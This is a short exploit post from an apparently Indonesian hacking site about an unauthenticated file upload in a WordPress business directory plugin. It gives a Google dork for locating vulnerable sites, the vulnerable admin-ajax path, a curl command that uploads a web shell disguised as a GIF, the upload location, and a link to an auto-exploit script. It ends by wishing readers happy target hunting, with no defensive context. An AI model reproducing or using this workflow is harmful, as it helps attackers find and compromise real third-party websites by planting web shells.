WordPress Business Directory Plugin File Upload - Lulz Cyber -->
  • lock_outline
    crypto
  • tab
    bash
  • bug_report
    exploit
  • settings_ethernet
    php
  • language
    website
  • colorize
    tips
  • whatshot
    event
  • launch
    tools
  • screen_share
    deface
  • security
    hacking

WordPress Business Directory Plugin File Upload

0
Shares
Facebook Twitter

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Our Partner

  • Error 404 Cyber News
  • MetroWorldHost Indonesia – Solusi VPS dan Web Hosting Indonesia
  • LinuxSec - Indonesian Linux Portal
  • Indonesia Komunitas
  • SainsKomputer
  • Linuxnesia
  • Infinite Haxor

Legal Dan Status

  • About Us
  • Privacy Policy
  • Contact
  • Patner Blog

Sosial

  • vipertekno01@gmail.com
  • FansPage
  • Group
Lulz Cyber ©2016 -
Template By Kendzgn
Press Enter to Search